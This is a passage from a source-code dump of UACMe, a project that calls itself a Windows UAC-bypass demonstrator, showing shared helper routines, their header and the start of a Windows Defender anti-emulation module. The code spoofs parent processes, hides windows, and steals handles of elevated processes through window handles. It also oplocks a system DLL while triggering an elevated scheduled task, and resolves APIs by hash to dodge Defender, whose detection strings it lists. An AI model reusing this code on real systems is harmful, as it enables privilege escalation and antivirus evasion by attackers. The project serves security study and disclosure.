0, 0, 0,\n            &InteractiveSid);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        for (i = 0; i < groupInfo->GroupCount; i++) {\n\n            if (RtlEqualSid(\n              
  InteractiveSid,\n                groupInfo->Groups[i].Sid))\n            {\n                IsInteractiveSid = TRUE;\n                break;\n            }\n        }\n\n    } while (FALSE);\n\n    if (groupInfo != NULL)\n        ucmxHeapFree(groupInfo);\n\n    if (pbInteractiveSid)\n        *pbInteractiveSid = IsInteractiveSid;\n\n    if (InteractiveSid)\n        RtlFreeSid(InteractiveSid);\n\n    return status;\n}\n\n/*\n* ucmIsLocalSystem\n*\n* Purpose:\n*\n* pbResult will be set to TRUE if current account is run by system user, FALSE otherwise.\n*\n* Function returns operation status code.\n*\n*/\nNTSTATUS ucmIsLocalSystem(\n    _Out_ PBOOL pbResult)\n{\n    BOOL                            bResult = FALSE;\n\n    NTSTATUS                        status = STATUS_UNSUCCESSFUL;\n    HANDLE                          hToken = NULL;\n\n    ULONG                           LengthNeeded = 0;\n\n    PSID                            SystemSid = NULL;\n    PTOKEN_USER                     ptu = NULL;\n    SID_IDENTIFIER_AUTHORITY        NtAuth = SECURITY_NT_AUTHORITY;\n\n    status = NtOpenProcessToken(\n        NtCurrentProcess(),\n        TOKEN_QUERY,\n        &hToken);\n\n    if (NT_SUCCESS(status)) {\n\n        status = NtQueryInformationToken(\n            hToken,\n            TokenUser,\n            NULL,\n            0,\n            &LengthNeeded);\n\n        if (status == STATUS_BUFFER_TOO_SMALL) {\n\n            ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded);\n\n            if (ptu) {\n\n                status = NtQueryInformationToken(\n                    hToken,\n                    TokenUser,\n                    ptu,\n                    LengthNeeded,\n                    &LengthNeeded);\n\n                if (NT_SUCCESS(status)) {\n\n                    status = RtlAllocateAndInitializeSid(\n                        &NtAuth,\n                        1,\n                        SECURITY_LOCAL_SYSTEM_RID,\n                        0, 0, 0, 0, 0, 0, 0,\n             
           &SystemSid);\n\n                    if (NT_SUCCESS(status)) {\n                        bResult = RtlEqualSid(ptu->User.Sid, SystemSid);\n                        RtlFreeSid(SystemSid);\n                    }\n\n                }\n                ucmxHeapFree(ptu);\n            }\n            else {\n                status = STATUS_INSUFFICIENT_RESOURCES;\n            }\n        } //STATUS_BUFFER_TOO_SMALL\n        NtClose(hToken);\n    }\n\n    if (pbResult)\n        *pbResult = bResult;\n\n    return status;\n}\n\n/*\n* ucmGetProcessElevationType\n*\n* Purpose:\n*\n* Returns process elevation type.\n*\n*/\nBOOL ucmGetProcessElevationType(\n    _In_opt_ HANDLE ProcessHandle,\n    _Out_ TOKEN_ELEVATION_TYPE * lpType\n)\n{\n    HANDLE hToken = NULL, processHandle = ProcessHandle;\n    NTSTATUS Status;\n    ULONG BytesRead = 0;\n    TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;\n\n    if (ProcessHandle == NULL) {\n        processHandle = GetCurrentProcess();\n    }\n\n    Status = NtOpenProcessToken(processHandle, TOKEN_QUERY, &hToken);\n    if (NT_SUCCESS(Status)) {\n\n        Status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,\n            sizeof(TOKEN_ELEVATION_TYPE), &BytesRead);\n\n        NtClose(hToken);\n    }\n\n    if (lpType)\n        *lpType = TokenType;\n\n    return (NT_SUCCESS(Status));\n}\n\n/*\n* ucmIsProcessElevated\n*\n* Purpose:\n*\n* Returns process elevation state.\n*\n*/\nNTSTATUS ucmIsProcessElevated(\n    _In_ ULONG ProcessId,\n    _Out_ PBOOL Elevated)\n{\n    NTSTATUS Status;\n    ULONG Dummy;\n    HANDLE ProcessHandle, TokenHandle;\n    CLIENT_ID ClientId;\n    TOKEN_ELEVATION TokenInfo;\n    OBJECT_ATTRIBUTES ObAttr = RTL_INIT_OBJECT_ATTRIBUTES(NULL, 0);\n\n    ClientId.UniqueProcess = UlongToHandle(ProcessId);\n    ClientId.UniqueThread = NULL;\n\n    if (Elevated) *Elevated = FALSE;\n\n    Status = NtOpenProcess(&ProcessHandle, MAXIMUM_ALLOWED, &ObAttr, &ClientId);\n    if (NT_SUCCESS(Status)) 
{\n\n        Status = NtOpenProcessToken(ProcessHandle, TOKEN_QUERY, &TokenHandle);\n        if (NT_SUCCESS(Status)) {\n\n            TokenInfo.TokenIsElevated = 0;\n            Status = NtQueryInformationToken(TokenHandle,\n                TokenElevation, &TokenInfo,\n                sizeof(TOKEN_ELEVATION), &Dummy);\n\n            if (NT_SUCCESS(Status)) {\n                if (Elevated) *Elevated = (TokenInfo.TokenIsElevated > 0);\n            }\n            NtClose(TokenHandle);\n        }\n        NtClose(ProcessHandle);\n    }\n\n    return Status;\n}\n\n/*\n* ucmSetEnvironmentVariable\n*\n* Purpose:\n*\n* SetEnvironmentVariable replacement.\n*\n*/\nBOOL ucmSetEnvironmentVariable(\n    _In_ LPCWSTR lpName,\n    _In_ LPCWSTR lpValue\n)\n{\n    NTSTATUS ntStatus;\n    UNICODE_STRING Name, Value;\n\n    ntStatus = RtlInitUnicodeStringEx(&Name, lpName);\n    if (!NT_SUCCESS(ntStatus)) {\n        return FALSE;\n    }\n\n    if (lpValue) {\n        ntStatus = RtlInitUnicodeStringEx(&Value, lpValue);\n        if (!NT_SUCCESS(ntStatus)) {\n            return FALSE;\n        }\n\n        ntStatus = RtlSetEnvironmentVariable(NULL, &Name, &Value);\n    }\n    else {\n        ntStatus = RtlSetEnvironmentVariable(NULL, &Name, NULL);\n    }\n\n    return (NT_SUCCESS(ntStatus));\n\n}\n\n//\n// OpLocks from R41N3RZUF477.\n//\n\n/*\n* ucmxWaitForOpLockThread\n*\n* Purpose:\n*\n* Thread procedure to wait for oplock notification.\n*\n*/\nDWORD WINAPI ucmxWaitForOpLockThread(\n    _In_ LPVOID p)\n{\n    DWORD bret = 0;\n    POPLOCK_FILE_CONTEXT ofc = (POPLOCK_FILE_CONTEXT)p;\n\n    if (p == NULL) {\n        return 1;\n    }\n\n    bret = 0;\n    if (!GetOverlappedResult(ofc->FileHandle, &ofc->Overlapped, &bret, TRUE)) {\n        return 1;\n    }\n\n    return 0;\n}\n\n/*\n* ucmWaitForOpLock\n*\n* Purpose:\n*\n* Wait for oplock notification with timeout.\n* Returns TRUE if oplock was successfully acquired and signaled, FALSE otherwise.\n*\n*/\nBOOL ucmWaitForOpLock(\n    _In_ 
POPLOCK_FILE_CONTEXT ofc,\n    _In_ DWORD timeout\n)\n{\n    BOOL bResult = FALSE;\n    DWORD exitcode = 0;\n    HANDLE thread = NULL;\n\n    if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n        return FALSE;\n    }\n\n    thread = CreateThread(NULL, 0x1000, (LPTHREAD_START_ROUTINE)ucmxWaitForOpLockThread,\n        (LPVOID)ofc, STACK_SIZE_PARAM_IS_A_RESERVATION, NULL);\n    if (thread == NULL)\n        return FALSE;\n\n    do {\n        if (WaitForSingleObject(thread, timeout) != WAIT_OBJECT_0) {\n            TerminateThread(thread, 1);\n            break;\n        }\n\n        if (GetExitCodeThread(thread, &exitcode)) {\n            bResult = (exitcode == 0);\n        }\n    } while (FALSE);\n\n    CloseHandle(thread);\n    return bResult;\n}\n\nBOOL ucmReleaseOpLock(\n    _In_ POPLOCK_FILE_CONTEXT ofc\n)\n{\n    if (ofc == NULL) {\n        return FALSE;\n    }\n\n    if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n        return FALSE;\n    }\n\n    CloseHandle(ofc->Overlapped.hEvent);\n    CloseHandle(ofc->FileHandle);\n\n    return TRUE;\n}\n\nBOOL ucmOpLockFile(\n    _In_ LPCWSTR FileName,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ DWORD ShareMode,\n    _In_ BOOL Exclusive,\n    _In_ POPLOCK_FILE_CONTEXT ofc\n)\n{\n    DWORD bret = 0;\n    REQUEST_OPLOCK_INPUT_BUFFER roib;\n    REQUEST_OPLOCK_OUTPUT_BUFFER roob;\n    DWORD flags = 0;\n\n    if (FileName == NULL || ofc == NULL) {\n        return FALSE;\n    }\n    if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n        return FALSE;\n    }\n\n    RtlSecureZeroMemory(&ofc->Overlapped, sizeof(OVERLAPPED));\n    RtlSecureZeroMemory(&roib, sizeof(roib));\n    RtlSecureZeroMemory(&roob, sizeof(roob));\n\n    roib.StructureLength = sizeof(roib);\n    roib.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;\n    roib.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;\n    roib.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;\n    roob.StructureLength = sizeof(roob);\n    
roob.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;\n    ofc->Overlapped.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);\n\n    if (ofc->Overlapped.hEvent == NULL) {\n        return FALSE;\n    }\n\n    flags = FILE_FLAG_OVERLAPPED;\n    if (GetFileAttributes(FileName) & FILE_ATTRIBUTE_DIRECTORY) {\n        flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;\n    }\n\n    if (DesiredAccess == 0) {\n        DesiredAccess = GENERIC_READ;\n    }\n\n    ofc->FileHandle = CreateFile(FileName, DesiredAccess, ShareMode, NULL, OPEN_EXISTING, flags, NULL);\n    if (ofc->FileHandle == INVALID_HANDLE_VALUE) {\n        return FALSE;\n    }\n\n    if (Exclusive) {\n        bret = 0;\n        DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK_LEVEL_1, NULL, 0, NULL, 0, &bret, &ofc->Overlapped);\n    }\n    else {\n        DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK, &roib, sizeof(roib), &roob, sizeof(roob), NULL, &ofc->Overlapped);\n    }\n\n    if (GetLastError() != ERROR_IO_PENDING) {\n        return FALSE;\n    }\n\n    return TRUE;\n}\n\n//\n// OpLocks from R41N3RZUF477 end.\n//\n\n/*\n* ucmxHideMainWindowCallback\n*\n* Purpose:\n*\n* EnumWindows callback to hide windows belonging to current process.\n*\n*/\nBOOL ucmxHideMainWindowCallback(\n    _In_ HWND hwnd,\n    _In_ LPARAM lParam\n)\n{\n    DWORD pid = 0;\n\n    UNREFERENCED_PARAMETER(lParam);\n\n    GetWindowThreadProcessId(hwnd, &pid);\n    if (pid == 0)\n        return TRUE;\n\n    if (GetCurrentProcessId() != pid)\n        return TRUE;\n\n    if (GetWindow(hwnd, GW_OWNER))\n        return TRUE;\n\n    if (!IsWindowVisible(hwnd))\n        return TRUE;\n\n    ShowWindow(hwnd, SW_HIDE);\n    return TRUE;\n}\n\n/*\n* ucmHideMainWindow\n*\n* Purpose:\n*\n* Hide current process windows.\n*\n*/\nVOID ucmHideMainWindow(\n    VOID\n)\n{\n    EnumWindows((WNDENUMPROC)ucmxHideMainWindowCallback, 0);\n}\n\n/*\n* ucmCheckUIAccessPermissions\n*\n* Purpose:\n*\n* Check if current process token has 
UIAccess flag and high integrity level.\n*\n*/\nBOOL ucmCheckUIAccessPermissions(\n    VOID)\n{\n    BOOL bResult = FALSE;\n    HANDLE hToken = NULL;\n    BYTE tmlbuf[sizeof(TOKEN_MANDATORY_LABEL) + sizeof(SID)];\n    TOKEN_MANDATORY_LABEL* tml = (TOKEN_MANDATORY_LABEL*)&tmlbuf[0];\n    DWORD UIAccessFlag = 0;\n    DWORD* pdwIntegrityLevel = NULL;\n    DWORD retLen = 0;\n\n    do {\n\n        if (!NT_SUCCESS(NtOpenProcessToken(\n            NtCurrentProcess(),\n            MAXIMUM_ALLOWED,\n            &hToken)))\n        {\n            break;\n        }\n\n        retLen = sizeof(UIAccessFlag);\n        if (!GetTokenInformation(hToken, TokenUIAccess, &UIAccessFlag, sizeof(UIAccessFlag), &retLen))\n            break;\n\n        if (UIAccessFlag == 0)\n            break;\n\n        retLen = sizeof(tmlbuf);\n        if (!GetTokenInformation(hToken, TokenIntegrityLevel, tml, retLen, &retLen))\n            break;\n\n        pdwIntegrityLevel = GetSidSubAuthority(tml->Label.Sid, 0);\n        if (*pdwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)\n            break;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (hToken) NtClose(hToken);\n    return bResult;\n}\n\ntypedef HANDLE(WINAPI* pfnGetProcessHandleFromHwnd)(HWND hwnd);\n\n/*\n* ucmCallGetProcessHandleFromHwnd\n*\n* Purpose:\n*\n* Wrapper for oleacc!GetProcessHandleFromHwnd.\n*\n*/\nHANDLE ucmCallGetProcessHandleFromHwnd(\n    _In_ HWND hwnd\n)\n{\n    HANDLE process = NULL;\n    HMODULE oleacc = NULL;\n    pfnGetProcessHandleFromHwnd pGetProcessHandleFromHwnd = NULL;\n\n    oleacc = LoadLibrary(L\"oleacc.dll\");\n    if (oleacc) {\n        pGetProcessHandleFromHwnd = (pfnGetProcessHandleFromHwnd)GetProcAddress(oleacc, \"GetProcessHandleFromHwnd\");\n        if (pGetProcessHandleFromHwnd) {\n            process = pGetProcessHandleFromHwnd(hwnd);\n        }\n        FreeLibrary(oleacc);\n    }\n    return process;\n}\n\n/*\n* ucmCreateProcessWithParent\n*\n* Purpose:\n*\n* CreateProcess with parent 
process set.\n*\n*/\nBOOL ucmCreateProcessWithParent(\n    _In_ LPWSTR lpCommandLine,\n    _In_ HANDLE hParent,\n    _In_ DWORD dwFlags,\n    _In_ WORD wShow,\n    _In_ PROCESS_INFORMATION* pi\n)\n{\n    SIZE_T ptsize = 0;\n    STARTUPINFOEX si;\n    LPPROC_THREAD_ATTRIBUTE_LIST ptal = NULL;\n    BOOL bResult = FALSE;\n\n    if (pi) {\n        InitializeProcThreadAttributeList(NULL, 1, 0, &ptsize);\n        ptal = (LPPROC_THREAD_ATTRIBUTE_LIST)ucmxHeapAlloc(ptsize);\n        if (ptal) {\n\n            RtlSecureZeroMemory(&si, sizeof(si));\n            si.StartupInfo.cb = sizeof(si);\n            si.StartupInfo.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;\n            si.StartupInfo.wShowWindow = wShow;\n            if (InitializeProcThreadAttributeList(ptal, 1, 0, &ptsize)) {\n                if (UpdateProcThreadAttribute(ptal, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParent, sizeof(HANDLE), NULL, NULL))\n                {\n                    si.lpAttributeList = ptal;\n                    bResult = CreateProcess(NULL, lpCommandLine, NULL, NULL, FALSE,\n                        EXTENDED_STARTUPINFO_PRESENT | dwFlags, NULL, NULL, (STARTUPINFO*)&si, pi);\n                }\n                DeleteProcThreadAttributeList(ptal);\n\n            }\n\n            ucmxHeapFree(ptal);\n        }\n    }\n    return bResult;\n}\n\n/*\n* ucmGetHwndFullProcessHandle\n*\n* Purpose:\n*\n* Duplicate process handle from hwnd.\n*\n*/\nHANDLE ucmGetHwndFullProcessHandle(\n    _In_ HWND hwnd\n)\n{\n    HANDLE hProcess = NULL;\n    HANDLE hDuplicate = NULL;\n\n    hProcess = ucmCallGetProcessHandleFromHwnd(hwnd);\n    if (hProcess) {\n        DuplicateHandle(hProcess, (HANDLE)-1, (HANDLE)-1, &hDuplicate, 0, FALSE, DUPLICATE_SAME_ACCESS);\n        CloseHandle(hProcess);\n    }\n\n    return hDuplicate;\n}\n\n/*\n* ucmxEnumElevatedWindows\n*\n* Purpose:\n*\n* EnumWindows callback to find first window belonging to elevated process.\n*\n*/\nBOOL ucmxEnumElevatedWindows(\n    
_In_ HWND hwnd, \n    _In_ LPARAM lParam)\n{\n    DWORD dwPid = 0;\n    HANDLE hProcess = NULL;\n    HANDLE hToken = NULL;\n    DWORD tkElvType = 0;\n    DWORD retLen = 0;\n\n    GetWindowThreadProcessId(hwnd, &dwPid);\n    if (dwPid == 0) {\n        // Continue to next window.\n        return TRUE;\n    }\n\n    hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPid);\n    if (hProcess == NULL) {\n        // Continue to next window.\n        return TRUE;\n    }\n\n    if (!OpenProcessToken(hProcess, MAXIMUM_ALLOWED, &hToken)) {\n        // Continue to next window.\n        CloseHandle(hProcess);\n        return TRUE;\n    }\n\n    CloseHandle(hProcess);\n\n    retLen = 0;\n    if (!GetTokenInformation(hToken, TokenElevationType, &tkElvType, sizeof(tkElvType), &retLen)) {\n        // Continue to next window.\n        CloseHandle(hToken);\n        return TRUE;\n    }\n\n    CloseHandle(hToken);\n\n    if (tkElvType == TokenElevationTypeFull) {\n        //\n        // Stop enumeration and return hwnd.\n        //\n        *(HWND*)lParam = hwnd;\n        return FALSE;\n    }\n\n    return TRUE;\n}\n\n/*\n* ucmFindFirstElevatedWindow\n*\n* Purpose:\n*\n* Find first elevated window.\n*\n*/\nHWND ucmFindFirstElevatedWindow(\n    VOID\n)\n{\n    HWND hwnd = NULL;\n    EnumWindows((WNDENUMPROC)ucmxEnumElevatedWindows, (LPARAM)&hwnd);\n    return hwnd;\n}\n\n/*\n* ucmStartBackupLockedElevatedProcess\n*\n* Purpose:\n*\n* Create oplock on system file and run elevated task through schtasks.exe.\n*\n*/\nBOOL ucmStartBackupLockedElevatedProcess(\n    _In_ POPLOCK_FILE_CONTEXT ofc\n)\n{\n    BOOL bResult = FALSE;\n    WCHAR szTaskCmdLine[MAX_PATH * 4];\n    WCHAR szOplockPath[MAX_PATH * 2];\n    PROCESS_INFORMATION pi;\n    STARTUPINFO si;\n    DWORD dwExitCode = 1;\n\n    if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {\n        return FALSE;\n    }\n\n    RtlSecureZeroMemory(szOplockPath, sizeof(szOplockPath));\n    
ucmxQuerySystemDirectory(szOplockPath, FALSE);\n    _strcpy(szTaskCmdLine, szOplockPath);\n    _strcat(szOplockPath, L\"WiFiCloudStore.dll\");\n    _strcat(szTaskCmdLine, L\"\\\\schtasks.exe /RUN /TN \\\"\\\\Microsoft\\\\Windows\\\\WlanSvc\\\\CDSSync\\\" /I\");\n\n    if (!ucmOpLockFile(szOplockPath, \n        GENERIC_READ, \n        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, \n        TRUE, \n        ofc)) \n    {\n        return FALSE;\n    }\n    \n    RtlSecureZeroMemory(&pi, sizeof(pi));\n    RtlSecureZeroMemory(&si, sizeof(si));\n\n    si.cb = sizeof(si);\n    si.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;\n    si.wShowWindow = SW_HIDE;\n\n    if (!CreateProcess(NULL, szTaskCmdLine, NULL, NULL, FALSE, \n        CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) \n    {\n        ucmReleaseOpLock(ofc);\n        return FALSE;\n    }\n\n    CloseHandle(pi.hThread);\n    if (WaitForSingleObject(pi.hProcess, 3000) == WAIT_OBJECT_0) {\n        if (GetExitCodeProcess(pi.hProcess, &dwExitCode)) {\n            bResult = (dwExitCode == 0);\n        }\n    }\n\n    CloseHandle(pi.hProcess);\n\n    if (!bResult) {\n        ucmReleaseOpLock(ofc);\n    }\n\n    return bResult;\n}\n"
  },
  {
    "path": "Source/Shared/util.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n*  TITLE:       UTIL.H\n*\n*  VERSION:     3.68\n*\n*  DATE:        07 Mar 2025\n*\n*  Global support routines header file shared between payload dlls.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef struct _UACME_PARAM_BLOCK {\n    ULONG Crc32;\n    ULONG SessionId;\n    ULONG AkagiFlag;\n    WCHAR szParameter[MAX_PATH + 1];\n    WCHAR szDesktop[MAX_PATH + 1];\n    WCHAR szWinstation[MAX_PATH + 1];\n    WCHAR szSignalObject[MAX_PATH + 1];\n} UACME_PARAM_BLOCK, * PUACME_PARAM_BLOCK;\n\ntypedef BOOL(WINAPI* PFNCREATEPROCESSW)(\n    LPCWSTR lpApplicationName,\n    LPWSTR lpCommandLine,\n    LPSECURITY_ATTRIBUTES lpProcessAttributes,\n    LPSECURITY_ATTRIBUTES lpThreadAttributes,\n    BOOL bInheritHandles,\n    DWORD dwCreationFlags,\n    LPVOID lpEnvironment,\n    LPCWSTR lpCurrentDirectory,\n    LPSTARTUPINFOW lpStartupInfo,\n    LPPROCESS_INFORMATION lpProcessInformation);\n\ntypedef BOOL(WINAPI* PFNCREATEPROCESSASUSERW)(\n    _In_opt_ HANDLE hToken,\n    _In_opt_ LPCWSTR lpApplicationName,\n    _Inout_opt_ LPWSTR lpCommandLine,\n    _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,\n    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,\n    _In_ BOOL bInheritHandles,\n    _In_ DWORD dwCreationFlags,\n    _In_opt_ LPVOID lpEnvironment,\n    _In_opt_ LPCWSTR lpCurrentDirectory,\n    _In_ LPSTARTUPINFOW lpStartupInfo,\n    _Out_ LPPROCESS_INFORMATION lpProcessInformation);\n\ntypedef struct _OBJSCANPARAM {\n    PWSTR Buffer;\n    SIZE_T BufferSize;\n} OBJSCANPARAM, * POBJSCANPARAM;\n\ntypedef struct _OPLOCK_FILE_CONTEXT {\n    DWORD 
Length;\n    HANDLE FileHandle;\n    OVERLAPPED Overlapped;\n} OPLOCK_FILE_CONTEXT, * POPLOCK_FILE_CONTEXT;\n\nVOID ucmBinTextEncode(\n    _In_ unsigned __int64 x,\n    _Inout_ wchar_t* s);\n\nVOID ucmGenerateSharedObjectName(\n    _In_ WORD ObjectId,\n    _Inout_ LPWSTR lpBuffer);\n\nBOOLEAN ucmPrivilegeEnabled(\n    _In_ HANDLE hToken,\n    _In_ ULONG Privilege);\n\nNTSTATUS ucmCreateSyncMutant(\n    _Out_ PHANDLE phMutant);\n\nBOOLEAN ucmIsProcess32bit(\n    _In_ HANDLE hProcess);\n\nDWORD ucmGetHashForString(\n    _In_ char* s);\n\nLPVOID ucmGetProcedureAddressByHash(\n    _In_ PVOID ImageBase,\n    _In_ DWORD ProcedureHash);\n\nVOID ucmGetStartupInfo(\n    _In_ LPSTARTUPINFOW lpStartupInfo);\n\nDWORD ucmExpandEnvironmentStrings(\n    _In_ LPCWSTR lpSrc,\n    _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,\n    _In_ DWORD nSize);\n\nPVOID ucmGetSystemInfo(\n    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);\n\nBOOL ucmLaunchPayload(\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload);\n\nBOOL ucmLaunchPayloadEx(\n    _In_ PFNCREATEPROCESSW pCreateProcess,\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload);\n\nBOOL ucmLaunchPayload2(\n    _In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,\n    _In_ BOOL bIsLocalSystem,\n    _In_ ULONG SessionId,\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload);\n\nBOOL ucmLaunchPayload3(\n    _In_opt_ LPWSTR pszPayload,\n    _In_opt_ DWORD cbPayload);\n\nLPWSTR ucmQueryRuntimeInfo(\n    _In_ BOOL ReturnData);\n\nBOOLEAN ucmDestroyRuntimeInfo(\n    _In_ LPWSTR RuntimeInfo);\n\nBOOL ucmIsUserWinstaInteractive(\n    VOID);\n\nNTSTATUS ucmIsUserHasInteractiveSid(\n    _In_ HANDLE hToken,\n    _Out_ PBOOL pbInteractiveSid);\n\nNTSTATUS ucmIsLocalSystem(\n    _Out_ PBOOL pbResult);\n\nHANDLE ucmOpenAkagiNamespace(\n    VOID);\n\n_Success_(return == TRUE)\nBOOL ucmReadSharedParameters(\n    _Out_ UACME_PARAM_BLOCK * SharedParameters);\n\nVOID ucmSetCompletion(\n    _In_ LPWSTR 
lpEvent);\n\nBOOL ucmGetProcessElevationType(\n    _In_opt_ HANDLE ProcessHandle,\n    _Out_ TOKEN_ELEVATION_TYPE * lpType);\n\nNTSTATUS ucmIsProcessElevated(\n    _In_ ULONG ProcessId,\n    _Out_ PBOOL Elevated);\n\nPLARGE_INTEGER ucmFormatTimeOut(\n    _Out_ PLARGE_INTEGER TimeOut,\n    _In_ DWORD Milliseconds);\n\nVOID ucmSleep(\n    _In_ DWORD Milliseconds);\n\nBOOL ucmSetEnvironmentVariable(\n    _In_ LPCWSTR lpName,\n    _In_ LPCWSTR lpValue);\n\nBOOL ucmOpLockFile(\n    _In_ LPCWSTR FileName,\n    _In_ ACCESS_MASK DesiredAccess,\n    _In_ DWORD ShareMode,\n    _In_ BOOL Exclusive,\n    _In_ POPLOCK_FILE_CONTEXT ofc);\n\nBOOL ucmReleaseOpLock(\n    _In_ POPLOCK_FILE_CONTEXT ofc);\n\nBOOL ucmWaitForOpLock(\n    _In_ POPLOCK_FILE_CONTEXT ofc,\n    _In_ DWORD timeout);\n\nVOID ucmHideMainWindow(\n    VOID);\n\nBOOL ucmCheckUIAccessPermissions(\n    VOID);\n\nHANDLE ucmCallGetProcessHandleFromHwnd(\n    _In_ HWND hwnd);\n\nBOOL ucmCreateProcessWithParent(\n    _In_ LPWSTR lpCommandLine,\n    _In_ HANDLE hParent,\n    _In_ DWORD dwFlags,\n    _In_ WORD wShow,\n    _In_ PROCESS_INFORMATION * pi);\n\nHANDLE ucmGetHwndFullProcessHandle(\n    _In_ HWND hwnd);\n\nHWND ucmFindFirstElevatedWindow(\n    VOID);\n\nBOOL ucmStartBackupLockedElevatedProcess(\n    _In_ POPLOCK_FILE_CONTEXT ofc);\n\n#ifdef _DEBUG\n#define ucmDbgMsg(Message)  OutputDebugString(Message)\n#else\n#define ucmDbgMsg(Message) \n#endif\n"
  },
  {
    "path": "Source/Shared/windefend.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2026\n*\n*  TITLE:       WINDEFEND.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Feb 2026\n*\n*  MSE / Windows Defender anti-emulation part.\n*\n*  WARNING: Kernel32/ntdll only dependencies.\n*\n*  Short FAQ:\n*\n*  Q: Why is this module included in UACMe,\n*     I thought this is a demonstrator tool, not real malware?\n*\n*  A: WinDefender is a default AV software installed on every Windows\n*     since Windows 8. Because some of the lazy malware authors copy-pasted\n*     the whole UACMe project into their crappiest malware, WinDefender has\n*     several signatures to detect UACMe and its components.\n*     Example of WinDefend signature: Bampeass. We cannot be prevented by this\n*     as this demonstrator must be running on the newest Windows OS versions.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"shared.h\"\n\n#pragma warning(push)\n#pragma warning(disable: 4055)\n#pragma warning(disable: 4152)\n\n/*\n\nWD Signatures\n\nTrojan:Win64/Bampeass.A\n\nTriggers:\n[ U C M ]   W u s a   f a i l e d   c o p y   H i b i k i\n% t e m p % \\ H i b i k i . d l l\nE l e v a t i o n : A d m i n i s t r a t o r ! 
n e w : { 4 D 1 1 1 E 0 8 - C B F 7 - 4 f 1 2 - A 9 2 6 - 2 C 7 9 2 0 A F 5 2 F C }\nU A C M e   i n j e c t e d ,   F u b u k i   a t   y o u r   s e r v i c e\n\n\nTrojan:Win64/Bampeass.B\n\nTriggers:\nUACMe injected, Hibiki at your service.\nucmLoadCallback, dll load %ws, DllBase = %\n\n\nTrojan:Win64/Bampeass.C\n\nTriggers:\nucmLoadCallback, dll load %ws, DllBase = %p\nUACMe injected, Hibiki at your service.\nucmLoadCallback, kernel32 base found\n\n\nHackTool:Win64/UACMe.A!MSR\n\nTriggers:\n\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\UAC\\COMAutoApprovalList\nrun /tn \"\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup\" /i\n\"UACMe main module\nUAC is now disabled.\\nYou must reboot your computer for the changes to take effect.\n_FubukiProc4\nUACMe v3.1.9.1905\n\\Software\\KureND\nArisuTsuberuku\nAkagiCompletionEvent\nAkagiSharedSection\n\nHackTool:Win32/Fubuki!MTB\n\nTriggers:\nAkagiSharedSection\nsystem32\\\n_FubukiProc2\nmmc.exe\n\\?\\globalroot\\systemroot\\system32\\sysprep\\unbcl\nCorBindToRuntimeEx\nCreateUri\n\n*/\n\nDWORD wdxEmulatorAPIHashTable[] = {\n    0x70CE7692,\n    0xD4CE4554,\n    0x7A99CFAE\n};\n\nPVOID wdxGetProcedureAddressByHash(\n    _In_ PVOID ImageBase,\n    _In_ DWORD ProcedureHash);\n\n\n/*\n* wdxGetHashForString\n*\n* Purpose:\n*\n* Calculates specific hash for string.\n*\n*/\nDWORD wdxGetHashForString(\n    _In_ char *s\n)\n{\n    DWORD h = 0;\n\n    while (*s != 0) {\n        h ^= *s;\n        h = RotateLeft32(h, 3) + 1;\n        s++;\n    }\n\n    return h;\n}\n\n/*\n* wdxGetProcedureAddressByHash\n*\n* Purpose:\n*\n* Return pointer to function in MpClient from name hash value.\n*\n*/\nPVOID wdxGetProcedureAddressByHash(\n    _In_ PVOID 